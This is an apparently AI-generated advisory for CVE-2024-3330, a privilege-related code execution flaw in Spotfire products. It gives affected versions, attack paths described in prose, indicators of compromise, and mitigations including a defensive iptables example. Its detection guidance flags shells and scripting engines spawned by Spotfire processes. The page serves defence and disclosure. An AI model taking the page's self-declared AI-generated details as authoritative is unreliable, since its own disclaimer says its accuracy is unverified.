CVE-2024-3330 Overview
CVE-2024-3330 is a code execution vulnerability affecting Spotfire Analyst, Spotfire Server, and Spotfire for AWS Marketplace. The flaw allows authenticated attackers to execute arbitrary code across multiple Spotfire deployment scenarios, including the installed Windows client, the Web Player (Business Author), and Automation Services. The vulnerability is categorized under CWE-250, Execution with Unnecessary Privileges. Exploitation against the Windows client requires user interaction, while the Web Player and Automation Services paths do not.
Critical Impact
Successful exploitation enables arbitrary code execution as the account running the Web Player or Automation Services process, with scope change to other components.
Affected Products
- Spotfire Analyst: versions 12.0.9 through 12.5.0, and 14.0 through 14.0.2
- Spotfire Server: versions 12.0.10 through 12.5.0, 14.0 through 14.0.3, and 14.2.0 through 14.3.0
- Spotfire for AWS Marketplace: versions 14.0 before 14.3.0
Discovery Timeline
- 2024-06-27 - CVE-2024-3330 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2024-3330
Vulnerability Analysis
The vulnerability resides in three distinct execution surfaces of the Spotfire analytics platform. On the installed Windows client, an attacker can trigger arbitrary code execution provided a user other than the attacker interacts with crafted content. In the Web Player path, exploitation results in code execution as the service account running the Web Player process. The Automation Services path permits direct arbitrary code execution through the automation workflow. The scope change indicated by the CVSS vector means exploitation impacts resources beyond the originally vulnerable component.
Root Cause
The issue maps to CWE-250, Execution with Unnecessary Privileges. Spotfire components execute attacker-supplied logic with elevated privilege levels that exceed what the operation requires. This privilege mismatch transforms a content-level operation into full code execution on the host running the service.
Attack Vector
The attack requires network access and low privileges, with no user interaction for the Web Player and Automation Services paths. An authenticated user with limited Spotfire access can submit content or automation jobs that trigger code execution on the underlying server. For the Windows client path, an attacker delivers malicious analysis content that executes when a second user opens it. Refer to the Spotfire Security Advisory June 2024 for technical specifics.
Detection Methods for CVE-2024-3330
Indicators of Compromise
- Unexpected child processes spawned by Spotfire Server, Web Player, or Automation Services processes
- Outbound network connections from Spotfire service accounts to unfamiliar hosts
- New or modified analysis files (.dxp, .sbdf) uploaded shortly before anomalous process activity
- Spotfire log entries showing Automation Services jobs executed by low-privilege accounts performing system-level actions
Detection Strategies
- Monitor process creation events where the parent process is a Spotfire binary and the child is a shell, scripting engine, or LOLBin
- Alert on file writes to system or user-profile locations originating from Spotfire service accounts
- Correlate Spotfire authentication events with subsequent host-level behavioral anomalies on Spotfire servers
Monitoring Recommendations
- Forward Spotfire Server and Automation Services logs to centralized log analytics for retention and correlation
- Baseline normal Spotfire process trees and flag deviations such as cmd.exe, powershell.exe, or wscript.exe as descendants
- Review Web Player service account activity for unauthorized filesystem or registry modifications
How to Mitigate CVE-2024-3330
Immediate Actions Required
- Upgrade Spotfire Analyst, Spotfire Server, and Spotfire for AWS Marketplace to fixed releases identified in the vendor advisory
- Restrict Automation Services and Web Player permissions so service accounts run with least privilege
- Review and audit user accounts authorized to publish or execute Spotfire analyses and automation jobs
- Inspect recent Automation Services job history and uploaded analysis files for suspicious content
Patch Information
The vendor has released fixed versions documented in the Spotfire Security Advisory June 2024. For Spotfire for AWS Marketplace, upgrade to 14.3.0 or later. Apply corresponding patched builds for Spotfire Analyst and Spotfire Server as listed in the advisory.
Workarounds
- Limit network access to Spotfire Server and Web Player interfaces to trusted users and management networks only
- Disable Automation Services where it is not actively required until patches are applied
- Enforce strict content review for analysis files originating from non-administrative authors
# Example: restrict Spotfire Web Player access at the network layer
# Allow only the corporate management subnet to reach the Web Player endpoint
iptables -A INPUT -p tcp --dport 443 -s 10.10.0.0/16 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
